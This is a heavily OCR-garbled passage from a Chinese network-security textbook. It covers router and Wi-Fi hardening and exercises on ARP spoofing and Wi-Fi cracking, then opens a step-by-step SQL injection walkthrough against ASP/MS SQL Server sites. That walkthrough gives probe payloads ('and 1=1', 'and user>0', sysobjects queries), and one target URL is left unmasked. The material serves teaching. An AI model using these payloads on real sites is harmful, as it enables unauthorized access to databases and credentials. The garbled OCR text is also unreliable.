r. "Bi" ERRESEINA: 甚至 可 以 通过 按钮 一 一 “ 容 动 ”来 调整 各 条 过 涛 规则 的 顺序 L 
达到 不 同 的 过 涛 优先 令 。 


+ 转发 规则 


置 ( 如 带 更 2 ， 清 到 | “安全 设置 ” “防火 墙 设置 ”? 


-2208 
-pidmem 
m 


in&ipdiemge: FB 
RINENN: RAETRESEARIPEHESERUREDEHEG , StLHBNLESS AH 


nm 


生效 到 间 iria sc MARNE [ADOOS 次 帮 | NE 
1 [0000-2400 | 192 168.1 50-192.168.1.60 | 1000-1100 - - |ur|* 4| Hi 


[CE [| SETEBENW SESERHET || WEREREH 
ES »( ]sxx[ ]s 


* Ep 


图 5-158 IP 地 址 过 滤 


第 11 步 : 在 图 5-159 中 选择 “安全 设置 ”~ 域名 过 滤 ”, 单 击 “ 添 加 新 条 目 ” 按 钮 ,添加 过 
滤 规 则 。 
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本 页 通过 域名 过 源 来 限制 局 域 网 中 的 计算 机 对 某 些 网 站 的 访问 。 


防火 墙 相关 设置 ( 如 和 需 更 改 ， 请 到 “安全 设置 ”一 “防火 墙 设置 ”) 


防火 墙 功能 : FE 

EEDE: FE 

WEAN : 凡是 符合 已 设 域名 过 小 规则 的 数据 包 禁 止 通过 本 路 由 器 

rm 生效 时 间 | 域名 状态 | 配置 
1 | 0000-2400 www. x com 生效 辑 删除 


EZTAI 便 所 有 条 目 生效 便 所 有 条 目 失效 BERFUESKH 


F L3] 
图 5-159 域名 过 滤 


第 12 步 : 在 图 5-160 中 选择 “安全 设置 "MAC 地 址 过 滤 ”, 单 击 “ 添 加 新 条 目 ” 按 钮 ， 
添加 过 滤 规 则 。 


[uo 


CEBBBSdrACHE SENSE UE SEHE BUS EFI P HEREDI Internetti ia. 


防火 墙 相关 设置 加 需 更 疏 ,请 到 “安全 设置 ”一 “防火 墙 设置 ”) 


+ DHCF 服 务 器 防火 墙 功 能 : Fe 
转发 规则 Mac 地 址 过 滋 功 能 : 。 开局 
Me. 缺 省 过 小 规则 : Tub 列表 中 已 启用 的 WA 地 址 访问 Internet ， 允许 其 地 NAC 地 址 


访问 Internet 


ID MC 地 址 Ex3 状态 配置 | 
1 10-22-33-44-55-86 no 生效 AEM | 


。 IC 地址 过 源 


Æ 5-160 MAC 地 址 过 滤 


第 13 步 : 在 图 5-161 中 选择 “安全 设置 ”>“ 远 端 Web 438" ETE" Web 管理 端口 ”, 增 
加 了 路 申 器 的 安全 性 ,然后 单 击 * 保 存 ? 按 钮 。 


远 端 Web 管 理 
本 页 设置 路 由 器 的 YE8 管 理 端口 和 广域网 中 可 以 执行 远 端 YE8 管 理 的 计算 机 的 
Ted. 
+ 转发 规则 注意 : 1、 路 由 器 默认 的 YEB 管 理 病 口 为 80， 加 果 您 改变 了 默认 的 YEE 管 理 
_ 安全 设置 端口 ( 例如 改 为 8060， 推荐 修改 为 1024 以 后 的 端口 ， 以 免 与 知名 端 
DAR) s MZAA “IF 地 址 :请 口 ”的 方式 ( 例如 
capio ks http: //192. 188. 1. 1:8080) 才能 登录 路 由 器 执行 YEB 界 面 管理 。 此 
*IF 地 址 过 泥 功能 需要 重启 路 由 器 才能 生效 。 
* 域名 过 2、 路 由 器 默认 的 远 端 YEB 管 理 IP 地 址 为 0.0. 0.0， 在 此 默认 状态 
To 厂 域 网 中 所 有 计算 机 都 不 能 登录 路 由 器 执行 远 靖 WEB 管 理 ， 如 
果 您 改变 了 默认 的 远 端 WEB 管理 IF 地 址 ( 例如 改 为 202. 96. 12.8) ， 
EX 则 广域网 中 只 有 具有 指定 IF 地 址 ( 例如 202. 96. 12. 8) 的 计算 机 才 
si 能 登录 路 由 器 执行 远 端 WEB 管 理 。 加 果 将 远 端 EB 管理 IF 地 址 设 为 
* 路 由 功能 255. 255. 255. 255 , 那么， 广域网 中 所 有 的 计算 机 都 可 以 登录 路 由 
+ 王 与 IIAC 绑 定 器 执行 远 端 中 6B 管理. 
< Mos Web 管 理 油 口 : [8666 
IR BSS: [000 
EF [55] 


Æ 5-161 远 端 Web 管理 
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第 14 步 : 在 图 5-162 中 选择 “安全 设置 >“ 高 级 安全 设置 ”, 设 置 如 图 所 示 , 然 后 单 击 
“保存 ”按钮 。 


本 页 设置 高 统 安 全 防范 配置 。 只 有 当 “D0s 攻 击 防范 ”启用 的 时 候 , 其 后 面 
的 设置 才能 鳞 生 效 。( 注意 : 这 里 的 “数据 包 技 计 时 间 间 隔 ” 与 “系统 工 
具 ” 一 “流量 蚁 计 ” 中 的 “数据 包 坊 计 时 间 间 隔 ”为 同一 值 ， 无 论 在 哪 一 个 
醒 块 进行 修改 都 会 覆盖 另 一 模块 里 的 数值 。) 

另外 : 由 于 “Dos 攻击 防范 ”的 部 分 功能 是 以 相关 数据 包 的 统计 为 依据 的 ， 
因此 , fof “系统 工具 ”-“ 流 量 统 计 ” 中 的 流量 统计 功能 被 关闭 ,那么 将 
会 导致 这 部 分 功能 失效 。 同 时 该 功能 还 受 “ 防 火 墙 设置 ”中 的 “开局 防火 


38" MEA. 
sOECHHeBSIR: Coe) [i99 e 

Dos 攻击 防范 : ORBA OBR 
开局 ICMF-PLDop 攻 击 过 涛 : 口 


lo-FLODÉHÉ& KR : (5~3800) — [50  ] 包 / 黎 


开局 WpP-FLD0D 过 泥 : 口 
wo-FLOODÉHÉEUB: (5~3800) — [S0] e 


开启 TCP-SYN-FLD0D 攻 击 过 涛 : 口 
TCP-SYN-FLOODÉHS (WU : € 57-3600) [50 awt 


更 多 TP-LINK 无 贱 网 络 AEREO Ping: 
产品 ,请 点 击 查看 
禁止 来 自 LAN 口 的 Fing 包 通过 路 由 器 : 口 


图 5-162 高 级 安全 设置 
第 15 步 : 在 图 5-163 中 选择 “IP 与 MAC 绑 定 ”>“ 静 态 ARP 绑 定 设置 ”, 选 中 “启用 ” 
选项 , 单 击 “ 保 存 ” 按 钮 。 单 击 “ 增 加 单个 条 目 " 按 钮 ,添加 IP 与 MAC 绑 定 。 


x [IL 
+ Dict 二 页 设置 单机 的 MAC 地址 和 IF 地 址 的 匹配 规则 。 
+ 转发 规 


+ 安全 设 wE: — OxBm 。 加 局 用 W* 


chil TME e RE 
1 10-11-35-55-T1-99 192.168. 1.33 i85 His 


[ WEn$ TH || 便 所 有 条 目 生效 || MESERHEB ENERE 
当前 第 |: aln [WE] 


图 5-163 静态 ARP 绑 定 设置 


第 16 步 : 在 图 5-164 中 选择 “IP 与 MAC 绑 定 ”>“ARP 映射 表 ”。 


ID ”MMC 地 址 IPHME | 状态 | ”配置 
1 | 10-11-33-55-77-99 | 192. 168. 1. 33 ESE [FA] M 


EXE 全 部 导入 


图 5-164 ARP 映射 表 


第 17 步 : 在 图 5-165 中 选择 “系统 工具 ”一 “修改 登录 口令 ”, 修 改 登录 口令 后 , 单 击 “ 保 
存 ” 按 钮 。 
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修改 登录 口令 
本 页 修改 系统 管理 员 的 用 户 名 及 口令 。 


RAPZ: admin 
BROŞ: [we 

新 用 户 名 : adninnew 
soe: [e 
确认 新 口令 : 。 [ee 


Ee] [清空 ] [帮助 


图 5-165 修改 登录 口令 


3. 无 线 网 络 的 安全 

从 前 面 的 案例 可 知 , 无 线 网 络 ( 又 称 Wi-Fi) 可 能 存在 许多 网 络 安全 问题 。 一 般 情况 下 ， 
无 线 网 络 比 有 线 网 络 更 容易 受到 入侵 ,因为 被 攻击 的 计算 机 与 人 侵 者 的 计算 机 不 需要 物理 
上 的 连接 ,入 侵 者 的 计算 机 只 要 在 无 线路 由 器 或 中 继 器 的 有 效 信号 覆盖 范围 内 即 可 ,如 果 在 
内 部 网 络 传输 的 数据 没有 经 过 加 密 , 那 么 很 有 可 能 造成 隐私 数据 的 被 盗 。 

一 个 简单 的 无 线 网 络 拓扑 结构 如 图 5-166 所 示 。 


路 由 器 交换 机 D ) |) ) 


| Internet | / e 
223 i Jj Ap 无 线 客户 六 
«48 -—— 


图 5-166 简单 无 线 网 络 拓 扑 结构 


下 面 介 绍 保障 无 线 网 络 安全 的 一 些 措 施 。 

(1) 确定 AP( 无 线 接 人 点 ) 的 位 置 

前 面 案例 中 的 情况 就 是 邻居 家 的 AP 没有 放 在 一 个 合适 的 位 置 造成 的 。 所 以 ,首先 就 
应 注意 合理 放置 AP, 以 便 能 够 限制 信号 在 覆盖 区 以 外 的 传输 距离 。 别 将 AP 放 在 窗户 附 
近 , 因 为 玻璃 无 法 阻挡 信号 。 最 好 将 AP 放 在 需要 覆盖 区 域 的 中 心 ,使 泄露 到 墙 外 的 信号 尽 
可 能 少 。 不 过 ,完全 控制 无 线 信号 泄露 几乎 是 不 可 能 的 。 

(2) 修改 登录 AP 的 默认 用 户 名 和 密码 

一 般 的 小 型 无 线 网 络 是 通过 无 线路 由 器 或 中 继 器 访问 外 网 。 通 常 这 些 路 由 器 或 中 继 器 
设备 制造 商 为 了 便于 用 户 设置 这 些 设备 建立 起 无 线 网 络 ,都 提供 了 一 个 管理 页 面 , 在 这 个 页 
面 可 以 设置 该 设备 的 网 络 地 址 以 及 账号 等 信息 。 为 了 保证 只 有 设备 拥有 者 才能 使 用 这 个 管 
理 页 面 ,该 设备 通常 也 设 有 登录 界面 ,只 有 输入 正确 的 用 户 名 和 密码 的 用 户 才能 进入 管理 页 
面 。 然 而 在 设备 出 售 时 ,制造 商 给 每 一 个 型 号 的 设备 提供 的 默认 用 户 名 和 密码 都 是 一 样 ,不 
幸 的 是 ,很 多 用 户 购买 回 这 些 设 备 之 后 ,都 不 会 去 修改 设备 默认 的 用 户 名 和 密码 。 这 就 使 得 
黑客 们 有 机 可 乘 。 他 们 只 要 通过 简单 的 扫描 工具 就 能 够 很 容易 就 能 找到 这 些 设 备 并 尝试 用 
默认 的 用 户 名 和 密码 登录 管理 页 面 ,如 果 成 功 , 则 立即 得 到 该 无 线路 由 器 的 控制 权 。 所 以 ， 
最 好 修改 登录 AP 的 用 户 名 和 密码 ,防止 非法 用 户 轻易 对 无 线 AP 或 无 线 宽 带路 由 器 进行 
控制 。 
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(3) 修改 默认 的 SSID 

SSID(Service Set Identifier ,服务 区 标识 符 ) 是 一 个 无 线 网 络 的 标识 符 , 是 无 线 网 络 最 
基本 的 身份 认证 机 制 ,无 线 客 户 用 它 来 建立 与 某 个 AP 之 间 的 连接 。 无 线 客户 端 要 加 入 一 
个 无 线 网 络 时 需要 出 示 正 确 无 线 AP 或 无 线 宽带 路 由 器 的 SSID ,才能 访问 无 线 AP 或 无 线 
宽带 路 由 器 ,否则 ,无 线 AP 或 无 线 宽带 路 由 器 将 拒绝 该 无 线 客户 端 通过 本 服务 区 上 网 。 这 
个 标识 符 是 由 通信 设备 制造 商 设 置 的 ,并 且 每 个 厂商 都 用 自己 的 默认 值 。 如 果 不 为 无 线 网 
络 指定 一 个 SSID 或 者 只 使 用 默认 的 SSID, 那 么 任何 无 线 客户 端 都 可 以 进入 该 网 络 , 这 无 疑 
为 黑客 入 侵 网 络 提 供 了 方便 。 

(4) 禁止 SSID 广播 

在 无 线 网 络 中 ,路 由 设备 有 个 很 重要 的 功能 ,就 是 广播 SSID。 最 初 ,这 个 功能 主要 是 为 
那些 无 线 网 络 客户 端 流量 特别 大 的 商业 无 线 网 络 而 设计 的 。 开 启 了 SSID 广播 的 无 线 网 
络 , 其 路 由 设备 会 自动 向 其 有 效 范 围 内 的 无 线 网 络 客户 端 广播 自己 的 SSID ,无 线 网 络 客户 
端 接收 到 这 个 SSID 后 ,就 可 以 利用 这 个 SSID 使 用 这 个 网 络 了 。 但 是 ,这 个 功能 却 存在 极 
大 的 安全 隐患 ,因为 自动 为 想 进 入 该 网 络 的 黑客 提供 了 方便 。 但 是 ,在 商业 网 络 里 ,由 于 为 
了 满足 经 常 变动 的 无 线 网 络 接 入 端 ,必定 要 牺牲 安全 性 来 开启 SSID 广播 功能 ,但 是 作为 
SOHO(Small Office And Home) 无 线 网 络 来 讲 ,网 络 成 员 相 对 固定 ,所 以 应 该 关闭 SSID 广 
播 功能 。 

(5) 设置 MAC 过 滤 

基本 上 每 个 网 络 设备 (包括 无 线 网 络 设备 ) 都 有 一 个 独一无二 的 物理 地 址 或 MAC 地 
址 ,所 有 路 由 器 /中 继 器 等 路 由 设备 都 能 够 跟踪 所 有 经 过 它们 的 数据 包 的 源 MAC 地 址 ,并 
且 都 提供 对 MAC 地 址 的 操作 ,因此 ,可 以 利用 该 功能 来 设置 MAC 过 滤 , 通 过 建立 基于 
MAC 地 址 的 Access Control( 访 问 控制 表 , 允 许 接 入 无 线 网 络 的 MAC 地 址 列表 ) 来 防止 非 
法 设备 或 主机 的 接 入 。 因 为 MAC 地 址 列表 中 的 地 址 需要 手工 录入 ,扩展 能 力 差 ,只 适合 小 
型 的 网 络 规模 。 

注意 : 该 方法 不 是 绝对 有 效 , 因 为 可 以 修改 网 卡 的 MAC 地址。 

(6) WEP, WPA,WPA2 

只 依靠 访问 控制 实现 无 线 网 络 的 安全 是 不 够 的 ,还 需要 对 传输 的 数据 进行 加 密 ,数据 加 
密 可 保证 发 射 的 数据 只 能 被 所 期 望 的 用 户 接 收 和 理解 ,数据 加 密 方法 有 WEP、WPA、 
WPA2, WEP(Wired Equivalent Privacy, 有 线 等 效 保密 ) 协 议 对 在 两 台 设 备 间 无 线 传输 的 
数据 进行 加 密 , 用 以 防止 非法 用 户 窃听 或 侵入 无 线 网 络 。 不 过 密码 分 析 学 家 已 经 找 出 WEP 
有 多 个 弱点 ,因此 在 2003 年 被 WPA(Wi-Fi Protected Access) 淘 汰 ,又 在 2004 年 由 完整 的 
IEEE 802. 11i 标准 (又 称 为 WPA2) 所 取代 。 

(7) 禁用 DHCP 

如 果 启 用 DHCP 服务 ,那么 就 存在 一 个 安全 隐患 ,因为 要 接 入 该 无 线 网 络 的 入 侵 者 很 
容易 通过 DHCP 服务 得 到 一 个 合法 的 IP。 

在 成 员 固 定 的 小 型 网 络 中 ,最 好 禁用 DHCP, 然 后 为 网 络 成 员 设 备 分 配 固定 的 IP 地址 ， 
再 在 路 由 器 上 设 定 允 许 接 入 设备 的 IP 地 址 列表 ,从 而 可 以 有 效 地 防止 非法 入 侵 。 

禁用 DHCP 后 .黑客 必须 要 破解 本 无 线 网 络 的 IP 地 址 、 子 网 掩 码 以 及 其 他 必需 的 
TCP/IP 参数 ,这 无 疑 增加 了 黑客 人 侵 的 难度 。 
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(8) 禁用 SNMP 

如 果 AP 支持 SNMP ,那么 需要 禁用 SNMP 或 者 修改 AP 默认 的 公开 及 专用 的 共用 字 
符 串 。 和 否则 ,黑客 将 可 以 利用 SNMP 获取 关于 本 网 络 的 重要 信息 。 

(9) 主动 更 新 

安装 所 使 用 的 无 线路 由 器 或 无 线 网 卡 的 最 新 固件 或 驱动 程序 ,消除 以 前 存在 的 漏洞 。 
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本 章 介绍 了 端口 与 漏洞 扫描 以 及 网 络 监听 技术 、 缓 冲 区 洲 出 攻击 及 其 防范 、DoS 与 
DDoS 攻击 检测 与 防御 、arp 欺骗 .防火 墙 技术 、 入 侵 检 测 与 入 侵 防 御 技术 、 计 算 机 病毒 .VPN 
技术 、httptunnel 技术 、 蜜 铅 技 术 以 及 无 线 网 络 安全 等 内 容 。 并 且 通 过 对 一 系列 实例 的 介 
绍 , 加 深 读者 对 网 络 安全 和 攻防 方面 的 基础 知识 和 技术 的 理解 ,帮助 读者 提高 解决 实际 网 络 
安全 问题 的 能 力 。 
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1. 填空 题 

CD 黑客 常用 的 攻击 手段 : 等 。 

(2) 黑客 人 侵 的 步骤 一 般 可 以 分 为 3 AW ; a 

(3) 一 些 常用 的 信息 收集 命令 : š a 

等 。 

(4) 命令 用 于 确定 IP 地 址 对 应 的 物理 地 址 。 

(5) 是 对 计算 机 系统 或 其 他 网 络 设备 进行 与 安全 相关 的 检测 , 找 出 安全 隐患 
和 可 被 黑客 利用 的 漏洞 。 

(6) 就 是 一 扇 进入 计算 机 系统 的 门 。 

(7) 是 一 块 保 存 数据 的 连续 内 存 ,一 个 名 为 的 寄存 器 指向 它 的 顶部 ， 
它 的 底部 在 一 个 固定 的 地 址 。 

(8) 攻击 是 通过 对 主机 特定 漏洞 的 利用 攻击 导致 网 络 栈 失 效 、 系 统 崩 溃 、 主 机 
死机 而 无 法 提供 正常 的 网 络 服务 功能 。 

(9) DDoS 的 攻击 形式 主要 有 : 和 

(10) 是 控制 从 网 络 外 部 访问 本 网 络 的 设备 ,通常 位 于 内 网 与 Internet 的 连接 
处 ,充当 访问 网 络 的 唯一 入 口 ( 出 口 )。 

(11) Linux 提供 了 一 个 非常 优秀 的 防火 墙 工 具 ; 它 免费 、 功 能 强大 ,可 以 对 流 
入 流出 的 信息 进行 灵活 控制 ,并 且 可 以 在 一 台 低 配 置 的 机 器 上 很 好 地 运行 。 

(12) 根据 原始 数据 的 来 源 IDS 可 以 分 为 : 和 

(13) 是 一 组 计算 机 指令 或 者 程序 代码 ,能 自我 复制 ， 通常 拔 入 在 计算 机 程序 
中 ,能 够 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 计算 机 的 使 用 。 
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(14) 是 计算 机 病毒 的 一 种 ,利用 计算 机 网 络 和 安全 漏洞 来 复制 自身 的 一 段 
代码 。 

(15) 只 是 一 个 程序 , 它 驻 留 在 目标 计算 机 中 , 随 计 算 机 启动 而 自动 启动 ,并 且 
在 某 一 端口 进行 监听 ,对 接收 到 的 数据 进行 识别 ,然后 对 目标 计算 机 执行 相应 的 操作 。 

(16) 特洛伊 木马 包括 两 个 部 分 : 和 " 

a7) 是 利用 网 页 来 进行 破坏 的 病毒 , 它 存 在 于 网 页 之 中 ,其 实 是 使 用 一 些 脚 
本 语言 编写 的 一 些 恶 意 代码 ,利用 浏览 器 漏洞 来 实现 病毒 的 植 和 人 。 

(18) 是 指 黑客 自己 建立 带 病毒 的 网 站 ,或 者 入 侵 大 流量 网 站 ,然后 在 其 网 页 
中 植 和 人 木马 和 病毒 , 当 用 户 浏览 到 这 些 网 页 时 就 会 中 毒 。 

(19) EART Windows 操作 系统 中 的 脚本 语言 工作 环境 。 

(20) 被 定义 为 通过 一 个 公用 网 络 建立 一 个 临时 的 、 安 全 的 连接 ,是 一 条 穿 过 
公用 网 络 的 安全 、 稳 定 的 通道 。 

(21) 是 一 种 资源 , 它 的 价值 是 被 攻击 或 攻陷 。 

(22) httptunnel 技术 也 称 为 ,是 一 种 绕 过 防火 墙 端口 屏蔽 的 通信 方式 。 


2. 思考 与 简 答题 

(1) 阐述 目前 网 络 的 安全 形势 。 

(2) 阐述 黑客 攻击 的 一 般 步 又 。 

(3) 常用 的 信息 收集 命令 有 哪些 ?它们 的 功能 是 什么 ? 

(4) 阐述 缓冲 区 溢出 的 攻击 原理 。 有 哪些 方法 可 以 尽量 避免 缓冲 区 溢出 ? 

(5) 阐述 DoS 与 DDoS 攻击 的 原理 。 有 哪些 方法 可 以 尽量 防范 DoS 与 DDoS 攻击 ? 
(6) 阐述 中 间 人 攻击 的 原理 。 

CD. 入侵 检测 与 人 侵 防 御 技术 的 优 缺 点 是 什么 ? 

(8) 计算 机 病毒 、 蠕 虫 和 木马 带 来 的 威胁 有 哪些 ? 

(9) 阐述 网 页 病毒 、 网 页 木马 的 传播 与 工作 过 程 。 

(10) 曾 述 病毒 蠕虫 和 木马 的 一 般 清除 方法 。 

(11) WIE Fl Co Sti br AR WI FE f o 

(12) 无 线 网 络 的 安全 隐患 有 哪些 ? 

3. 上 机 题 

COD 实验 环境 如 图 5-31 所 示 ,192. 168. 85. 129 对 192. 168. 85. 1 实施 arp 欺骗 。 
(2) 在 Linux 中 配置 防火 墙 。 

(3) 实验 环境 如 图 5-61 所 示 ,练习 中 间 人 攻击 技术 。 

(4) 实验 环境 如 图 5-72 所 示 ,练习 灰 铝 子 的 使 用 。 

(5) 实验 环境 如 图 5-137 所 示 ,通过 httptunnel 技术 对 192. 168. 10. 1 进行 入 侵 。 
(6) 实验 环境 如 图 5-142 所 示 ,Kali Linux 中 使 用 Aircrack-ng 破解 Wi-Fi 密码 。 
(7) 实验 环境 如 图 5-149 所 示 ,进行 无 线 网 络 安全 配置 。 
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本 章 学 习 目 标 

。 掌握 SQL 注入 式 攻击 的 原理 。 

。 理解 对 SQL 注入 式 攻击 的 防范 。 

* 掌握 使 用 SQLmap 进行 SQL 注入 的 技术 。 
。 了 解 常见 的 数据 库 安 全 问题 及 安全 威胁 。 
。 了 解数 据 库 系统 安全 体系 ` 机 制 和 需求 。 

。 了解 数据库 安全 管理 原则 。 


数据 库 系统 是 计算 机 技术 的 一 个 重要 分 支 , 从 20 世纪 60 年 代 后 期 发 展 至 今 , 已 经 成 为 
一 门 非常 重要 的 学 科 。 数 据 库 是 信息 存储 管理 的 主要 形式 ,是 单机 或 网 络 信 息 系 统 的 主要 
基础 。 

本 章 通过 实例 介绍 数据 库 系统 的 安全 特性 以 及 数据 库 系统 安全 所 面临 的 威胁 。 
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随 着 网 络 与 信息 技术 的 飞速 发 展 ,互联 网 已 经 逐渐 改变 了 人 们 的 生活 方式 ,成 为 人 们 生 
活 中 不 可 缺少 的 一 部 分 。 越 来 越 多 的 企业 建设 了 基于 互联 网 的 业务 信息 系统 (Web) ,所 以 
网 络 安全 的 重要 性 就 此 体现 出 来 了 。 有 更 多 的 攻击 是 在 隐蔽 的 情况 下 进行 的 ,有 些 大 型 企 
业 网 站 被 黑客 控制 长 达 几 个 月 ,可 是 该 网 站 的 管理 员 竞 然 没有 发 现 。 可 见 ,Web 应 用 正在 
成 为 网 络 安全 的 最 大 弱点 。 下 面 通过 实例 介绍 SQL 注入 式 攻击 给 Web 应 用 带 来 的 威胁 。 


6.1.1 实例 : 注入 攻击 MS SQL Server 


SQL 注入 攻击 是 指 攻击 者 通过 黑 盒 测 试 的 方法 检测 目标 网 站 脚本 是 否 存在 过 滤 不 严 
的 问题 ,如果 有 ,那么 攻击 者 就 可 以 利用 某 些 特殊 构造 的 SQL 语句 ,通过 在 浏览 器 直接 查询 
管理 员 的 用 户 名 和 密码 ,或 者 利用 数据 库 的 一 些 特性 进行 权限 提升 。 

本 节 要 注入 的 网 站 如 图 6-1 所 示 ,由 于 只 是 为 了 介绍 注入 网 站 的 方法 ,并 未 实质 人 侵 该 
网 站 ,同时 也 是 为 了 对 该 网 站 保密 ,因此 在 后 面 的 截图 中 隐藏 了 该 网 站 的 相关 信息 。 

图 6-1 显示 的 是 要 被 注入 网 站 的 首页 ,将 鼠标 指针 放 在 “我 院 召 开 “ 平 安 奥 运 ? 工 作 部 署 
会 "上 ,在 状态 栏 显 示 其 URL 是 http://www. xxx. com. cn/detail. asp? productid — 392, 
看 到 URL 中 有 类 似 “detail. asp? productid” 这 样 的 信息 ,就 可 以 猜测 该 网 站 是 否 存在 注入 
漏洞 了 。 

第 13b: 加 单 引 号 。 如 图 6-2 所 示 是 在 浏览 器 地 址 栏 中 http://www. xxx. com. cn/ 


第 6 章 SNR CEP] 


E] Mtp://er [E coa. ef 


图 党 院 举 办 消防 知识 讲座 
B 392007 3E S EAR T 


-=n 


图 6-1 被 注入 网 站 的 首页 


E-D- O Ano ERE aen roeie ) [s [ie] [C 


a 


Microsoft OLE DB Provider for ODBC Drivers WHR ° 80040014" 


[Microsoft] [ODBC SQL Server Driver] [SQL Server] Æ 1 行 :“” 附近 有 语法 错误 。 
/detail. asp, ff 22 


E Lac m 


图 6-2 加 单 引号 


detail. asp? productid 一 392 后 面 加 一 个 单 引号 . 按 Enter 键 后 ,服务 器 返回 错误 提示 o 

从 返回 的 错误 提示 可 知 : 网 站 使 用 的 是 SQL Server 数据 库 , 通 过 ODBC 来 连接 数据 
库 ,程序 存在 过 滤 不 严密 的 问题 ,因为 输入 的 单 引 号 被 程序 解析 执行 了 。 

第 2 步 : 测试 “and 1—1", WE 6-3 所 示 ,在 浏览 器 地 址 栏 http://www. xxx. com. cn/ 
detail. asp? productid 一 392 后 面 加 “and 1 一 1”, 按 Enter 键 后 ,服务 器 返回 到 正常 页 面 。 


E- >- CO [i ERES wee RTT — OB Ea. &) 


图 6-3 测试 “and 1 一 1” 


第 3 步 : 测试 "and 1 一 2”。 如 图 6-4 所 示 ,在 浏览 器 地 址 栏 中 http://www. xxx. com. cn/ 
detail. asp? productid — 392 后 面 加 “and 1 一 2”, 按 Enter 键 后 ,服务 器 返回 错误 提示 o 
第 2 步 和 第 3 步 就 是 经 典 的 1 一 1、1 一 2 测试 法 。 
如 果 一 个 网 站 可 以 被 注入 :那么 .第 2 步 显示 正常 网 页 .第 3 步 显 示 错 误 提 示 , 提 示 
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图 6-4 测试 “and 1 一 2” 


BOF 或 EOF 中 有 一 个 是 * 真 ”, 或 者 当前 的 记录 已 被 删除 ,所 需 的 操作 要 求 一 个 当前 的 

如 果 一 个 网 站 不 可 以 被 注入 ,那么 第 2 步 和 第 3 步 都 会 显示 错误 提示 。 

第 4 步 : 判断 数据 库 类 型 。 对 于 不 同 的 数据 库 , 函 数 和 注入 方法 都 有 差异 ,所 以 在 注入 
之 前 ,还 要 判断 数据 库 的 类 型 。 如 果 在 第 1 步 加 单 引 号 后 得 不 到 有 价值 的 信息 ,那么 可 以 利 
用 “user 二 0" 来 判断 数据 库 类 型 。 

如 图 6-5 所 示 ,在 浏览 器 地 址 栏 中 http://www. xxx. com. cn/detail. asp? productid 一 
392 后 面 加 “and user> 0”, fk Enter 键 后 ,服务 器 返回 错误 提示 ,可 知 是 SQL Server 数 
据 库 。 

"http://www. xxx. com. cn/detail. asp? productid 一 392 and user 二 0 的 含义 : and 前 
面 的 语句 是 正常 的 ,and 后 面 的 user 是 SQL Server 的 一 个 内 置 变量 , 它 的 值 是 当前 连接 数 
据 库 的 用 户 名 ,类 型 是 nvarchar。 拿 一 个 nvarchar 类 型 的 值 和 int 类 型 的 数 0 进行 比较 , 系 
统 会 试图 将 nvarchar 类 型 的 值 转 换 为 int 类 型 ,不 过 ,在 转换 过 程 中 会 出 错 ,SQL Server 的 
出 错 提 示 如 图 6-5 所 示 , 其 中 cw88163 是 当前 连接 数据 库 的 用 户 名 。 


qe o rpm men mee. | =] 请 |- 


总 
Microsoft OLE DB Provider for ODBC Drivers 错误 “80040e07 ^" 
[Microsoft] [ODBC SQL Server Driver) [SQL Server] nvarchar 值 “cv88163” 转 岳 为 数据 类 型 为 int 的 列 时 发 生活 法 错误 。 J 
/detail.asp. fT 22 s 


图 6-5 测试 “and user>0” 


注意 : SQL Server 中 有 个 用 户 sa, 该 用 户 是 一 个 等 同 于 Adminstrators 权限 的 角色 。 
上 面 的 方法 可 以 很 方便 地 测试 出 是 否 是 用 sa 连接 数据 库 , 如 果 是 用 sa 连接 数据 库 , 那 么 将 
提示 “将 nvarchar 值 'dbo' 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 错误 ”。 

如 果 IIS 服务 器 不 允许 返回 错误 提示 ,可 以 从 Access 和 SQL Server 的 区 别 入 手 。 
Access 和 SQL Server 都 有 自己 的 系统 表 , 比 如 存放 数据 库 中 所 有 对 象 的 表 为 : Access 是 
在 系统 表 msysobjects 中 ,但 在 Web 环境 下 读 该 表 会 提示 “没有 权限 ”; SQL Server 是 在 表 
sysobjects 中 ,在 Web 环境 下 可 正常 读 取 。 

在 确认 可 以 注入 的 情况 下 ,使 用 下 面 的 语句 : 


http://www. xxx. com. cn/detail.asp?productid = 392 and (select count( * ) from sysobjects)>0 


如 果 是 SQL Server 数据 库 ,那么 该 网 址 显示 的 页 面 与 “www. xxx. com. cn/detail. asp? 
productid 一 392? 是 一 样 的 ,如 图 6-6 所 示 。 
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我 院 召开 “平安 奥运 ”工作 部 署 会 


图 6-6 select count( * ) from sysobjects 


使 用 下 面 的 语句 : 
http://www. xxx. com. cn/detail.asp?productid = 392 and (select count( * ) from msysobjects)> 0 


如 果 是 SQL Server 数据 库 ,由 于 找 不 到 表 msysobjects, 服 务 器 会 返回 错误 提示 “对 象 


名 'msysobjects' 无 效 ”, 如 图 6-7 所 示 , 如 果 Web 程序 有 容错 能 力 , 那 么 服务 器 返回 页 面 也 与 
原 页 面 不 同 。 


.CO 人 OL /mt D) [Gi-| 医 
Microsoft OLE DB Provider for ODBC Drivers 错误 “80040e37" al 
[Microsoft] [ODBC SQL Server Driver] [SQL Server] 对 象 名 “azysobjects” 无效 。 j 
/detail.asp. fT 22 A 


图 6-7 select count( * ) from msysobjects 


使 用 下 面 的 语句 : 


http://www. ahsdxy. ah. edu. cn/ReadNews. asp? NewsID = 294 and (select count ( * ) from 
msysobjects)» 0 


如 图 6-8 所 示 ,服务 器 会 返回 错误 提示 “不 能 读 取 记 录 ; 在 'msysobjects' 上 没有 读 取 数 
据 权 限 ”, 说 明 是 SQL Server 数据 库 。 


LIE O ET a or CI 画 


Microsoft JET Database Engine 错误 '80040e09" 


不 能 该 了 记录， 在 “msysobjects” 上 没有 该 取 数 据 权限 。 


/ReadNevs. asp. fT 13 


图 6-8 select count( * ) from msysobjects 


使 用 下 面 的 语句 : 


http://www. ahsdxy. ah. edu. cn/ReadNews. asp?NewsID = 294 and (select count( * ) from sysobjects)> 0 
如 图 6-9 所 示 ,服务 器 会 返回 错误 提示 o 

图 6-8 和 图 6-9 是 基于 www. xxx. ah. edu. cn 网 站 进行 的 测试 。 

第 5 步 : 猜测 表 名 。 如 图 6-10 所 示 ,在 浏览 器 地 址 栏 中 http://www. xxx. com. cn/ detail. 


asp? productid 一 392 后 面 加 “and (select count( * ) from admin) — =0” , f£ Enter 键 后 ,服务 
器 返回 错误 提示 ,说 明 不 存在 admin 表 。 
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Microsoft JET Database Engine 错误 “80040e37 
Microsoft Jet 数据 库 5 罕 找 不 到 输入 表 或 查询 "sysobjectz” 。 OE JREHEES UURCEEPOBSIENEN. 
/ReadNevs. asp. 行 13 


图 6-9 select count( * ) from sysobjects 


